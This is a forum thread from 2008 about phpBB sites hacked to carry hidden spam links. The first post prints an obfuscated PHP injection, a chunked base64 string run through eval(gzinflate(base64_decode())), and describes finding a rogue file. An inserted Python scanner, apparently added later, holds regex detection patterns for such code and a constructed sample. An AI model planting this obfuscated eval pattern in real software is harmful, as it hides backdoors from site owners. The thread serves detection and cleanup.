Battling the Hackers


Post by Turboladdade » December 6th, 2008, 10:16 am

Every now and then Info-Mac or System 7 Today (or both) are hacked. This usually results in hundreds or thousands of garbage links to generic medication and porn being attached to the bottom of every page in a hidden div. You cannot see it, but search engines can, and this presumably is an attempt to get higher search engine rankings.

Sometimes, the hackers are merely changing template or HTML files. These are pretty easy to track down: simply open up your template files and see what's not right.

In the /includes folder of my Info-Mac phpBB 3 folder, I found a rogue file named body.php. It had neither a recent modified nor creation date, so it was hard to find, but I did find it by comparing what was supposed to be in that folder, and what actually was. One extra file! Opening it shows a lot of hacker-ish code, including a big ASCII spider.

Other times, they change the PHP or other scripting files. This is harder to track down, but I wanted to share some code from the most recent hacking situation so that others may find it useful and know what to look out for.

I had this inserted into many PHP files here at Info-Mac. It's creating a variable named sosddsfagck. Basically it's gzipped content that is being told to unzip. The gzipped content itself includes more encrypted php code. But this is the format of what I saw:

$sosddsfagck='bZBBa8MwDIXvhf4HEQq2ISQdvYyWwi5jPe6Q2z';
$sosddsfagck=$sosddsfagck.'pGltqtmWMZWVvGxv77vGQZWalPst7T45M0EdIT';
$sosddsfagck=$sosddsfagck.'6YDE1h/lUm3ms0XE5gW2cGN+CgzaS/FRG0t1h+';
$sosddsfagck=$sosddsfagck.'QORYOtyOG691oje7uazz4XDXrWnrdZlhQA05Fl';
$sosddsfagck=$sosddsfagck.'DYMhB3F3W8GJOazL8iyuXDkbeVXwO8Ouqu7Lq2';
$sosddsfagck=$sosddsfagck.'IpimxPe5+pi1k7jLyGc6phZDLWnazTcgR7eExb';
$sosddsfagck=$sosddsfagck.'maPm+Buk1GbUkmLb4PCgpUjbje0hRr/VTjLZVs';
$sosddsfagck=$sosddsfagck.'bX58j0l5hD+gWMk8YEIb0BvnEYR/j+wv8u9fUN';
eval(gzinflate(base64_decode($sosddsfagck)));

So basically, any PHP script that is telling you to evaluate (run as PHP) the contents of a string decoded from base64 is highly suspect.
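The two checks described in the post above (an unexpected extra file in a directory, and eval() fed by gzinflate()/base64_decode()) can be scripted so they run over a whole phpBB tree instead of by eye. The following is an added example and not code from the post, from phpBB, or from Info-Mac. It does not execute anything: it reassembles the chunked $var='...'; $var=$var.'...'; string the way PHP would and then statically base64-decodes and inflates it, so the hidden layer can be read without running it. The infected-looking file it scans is constructed inline with a hypothetical payload; the real blob in the post is truncated and would not decode.

```python
import base64
import binascii
import re
import zlib

# Constructed sample: a hypothetical inner payload, wrapped in the same chunked
# concatenation shape the post shows (this is not the real blob from Info-Mac).
INNER_PAYLOAD = '<?php echo "<div class=hidden>spam links</div>"; ?>'


def _deflate(data: bytes) -> bytes:
    """Raw DEFLATE with no zlib/gzip header, which is what PHP's gzinflate() consumes."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def build_sample(var: str = "sosddsfagck", chunk: int = 38) -> str:
    """Build an infected-looking PHP file (constructed for this example)."""
    b64 = base64.b64encode(_deflate(INNER_PAYLOAD.encode())).decode()
    lines = [f"${var}='{b64[:chunk]}';"]
    for i in range(chunk, len(b64), chunk):
        lines.append(f"${var}=${var}.'{b64[i:i + chunk]}';")
    lines.append(f"eval(gzinflate(base64_decode(${var})));")
    return "<?php\n" + "\n".join(lines) + "\n"


# eval() fed directly by a decoder or decompressor; captures the variable it eats.
SUSPECT_EVAL = re.compile(
    r"\beval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\([^;]*?\$(\w+)",
    re.I,
)
# $v='...'; and $v=$v.'...'; lines that build the blob one chunk at a time.
CHUNK_ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*(?:\$(\w+)\s*\.\s*)?'([^']*)'\s*;", re.M)


def reassemble_literals(src: str) -> dict:
    """Follow each $v=$v.'...' chain and return {variable: full string}."""
    blobs = {}
    for name, prev, piece in CHUNK_ASSIGN.findall(src):
        if prev == name:                      # $v=$v.'chunk';
            blobs[name] = blobs.get(name, "") + piece
        elif not prev:                        # $v='first chunk';
            blobs[name] = piece
    return blobs


def decode_payload(blob: str):
    """Do statically what eval(gzinflate(base64_decode($v))) would do, without executing it."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return zlib.decompress(raw, -15).decode("utf-8", "replace")
    except (binascii.Error, zlib.error, ValueError):
        return None


def scan_source(src: str) -> list:
    """One finding per suspect eval(): line number, variable name, decoded payload or None."""
    blobs = reassemble_literals(src)
    findings = []
    for m in SUSPECT_EVAL.finditer(src):
        var = m.group(1)
        findings.append({
            "line": src.count("\n", 0, m.start()) + 1,
            "var": var,
            "decoded": decode_payload(blobs[var]) if var in blobs else None,
        })
    return findings


def extra_files(expected, actual) -> list:
    """Files on disk that a known-good listing does not contain. Timestamps are
    deliberately ignored: the rogue body.php in the post had no recent mtime."""
    return sorted(set(actual) - set(expected))


if __name__ == "__main__":
    for f in scan_source(build_sample()):
        print(f"line {f['line']}: eval() on ${f['var']} -> {f['decoded']!r}")
    print("extra:", extra_files({"functions.php", "constants.php"},
                                {"functions.php", "constants.php", "body.php"}))
```

To use it on a real install, feed scan_source() the contents of each .php file and extra_files() the file list of a pristine phpBB release of the same version next to the live directory listing. A decoded payload that is itself another eval(gzinflate(...)) string simply gets fed back through scan_source(), one layer at a time.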
Re: Battling the Hackers

Post by kriegvision » December 11th, 2008, 11:00 am

That's what happens when one modifies phpBB a lot. Lots of exploitable bugs get introduced!

It's a shame, really, that hackers can't find better things to do with their skills than post porno and generic pills. I've always wondered, how exactly is that a lucrative job? Who is paying these people and for what? It's not like those links ever get clicked, and they're always taken down within days, creating broken links to nowhere.